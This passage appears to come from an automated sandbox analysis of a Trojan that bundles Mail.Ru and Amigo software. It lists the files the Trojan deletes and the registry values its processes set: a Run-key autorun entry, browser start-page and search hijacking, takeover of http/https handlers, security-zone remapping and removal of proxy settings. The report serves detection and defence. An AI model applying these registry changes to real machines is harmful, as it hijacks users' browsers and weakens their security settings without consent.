%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\Locales\gu.pak (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\32.0.1705.153\chrome.dll (283704 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\ok.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\MailRuUpdater.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\master_preferences (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\vk.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\wow_helper.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1968_20975\Chrome-bin\amigo.exe (0 bytes)

Registry activity

The process mailruhomesearch.exe:656 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"ShowSearchSuggestions" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Mail.Ru\IE_Bar\Recovery\ie]
"DefaultSearchUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"SuggestionsURL" = "http://suggests.go.mail.ru/ie8?q={SearchTerms}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Mail.Ru\IE_Bar\Recovery\ie]
"DefaultScope" = ""

[HKCU\Software\Mail.Ru\IE_Bar\Settings]
"Guid" = "{1769696B-E1A8-4585-B64F-C79F60E969BA}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{FFEBBF0A-C22C-4172-89FF-45215A135AC7}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"FaviconURLFallback" = "http://go.mail.ru/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Mail.Ru\IE_Bar]
"DefBrowser" = "ie"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Mail.Ru\IE_Bar\Recovery\ie]
"HomePage" = "about:blank"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 E3 70 B3 6A D4 AD 59 A4 C9 9B BD 04 2E 52 B1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://mail.ru/cnt/10445?gp=profitraf3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"URL" = "http://go.mail.ru/search?q={SearchTerms}&fr=ntg&gp=profitraf3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"DisplayName" = "Поиск@Mail.Ru"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}]
"Deleted"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Secondary Start Pages"

The process dwwin.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 25 6D 95 7A E2 D9 98 F9 C7 A3 8F 01 98 49 D4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process amigo.exe:488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Classes\.html]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Classes\https\shell]
"(Default)" = "open"

[HKCU\Software\Classes\.shtml]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Classes\http\shell]
"(Default)" = "open"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Classes\http]
"URL Protocol" = ""

[HKCU\Software\Classes\https]
"URL Protocol" = ""

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Classes\.xhtml]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\.xht]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\.htm]
"(Default)" = "AmigoHTML.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 4D 66 15 85 1A AE CB 96 0F 25 85 AD 63 98 8C"

[HKCU\Software\Amigo]
"usagestats" = "0"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Classes\ftp]
"URL Protocol" = ""

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe,0"

[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "Amigo.QQL2B5ZRL54V5ERAM5WD2OE6LQ"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe -- %1"

The process MailRuUpdater.exe:820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"Publisher" = "Mail.Ru"
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe uninstall"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"DisplayName" = "Служба автоматического обновления программ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"VersionMinor" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]
"VersionMajor" = "1"
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru]
"MailRuUpdater.exe" = "Mail.Ru updater"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 26 97 E3 7D 5B 66 0E 44 21 4C 04 62 01 35 59"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MailRuUpdater" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\MailRuUpdater]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application]
"amigo.exe"

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MailRuUpdater"

The process MailRuUpdater.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 92 6A 18 AE FE 1F 31 52 8F 64 5C D3 67 13 8F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Mail.Ru\IE_Bar\Settings]
"Guid" = "{1769696B-E1A8-4585-B64F-C79F60E969BA}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Mail.Ru\Updater]
"IconsConvertation" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

The process AmigoDistrib.exe:324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 FD 8A 70 6D 47 CA 9D 5F 0C 0A 7C 32 DE D2 63"

[HKCU\Software\Mail.Ru\AmigoInstaller]
"RFR" = "newcustom3"

The process r45215.exe:884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"AmigoDistrib.exe" = "Amigo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\downloader_tmp_1912591986,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 0D 87 57 8C D3 3F 27 56 65 2D 4B BF 5A 8D 51"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"mailruhomesearch.exe" = "MailRuSputnik"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Winhlp313.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C B6 B8 1C 2E 4E DF CD 90 08 E0 BC B3 44 62 99"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"r45215.exe" = "r45215"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:1756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\My Documents\CommonData]
"Winhlp313.exe" = "Winhlp313"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 01 42 AB 24 D7 AF 66 E4 C2 9F 07 28 01 B4 92"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
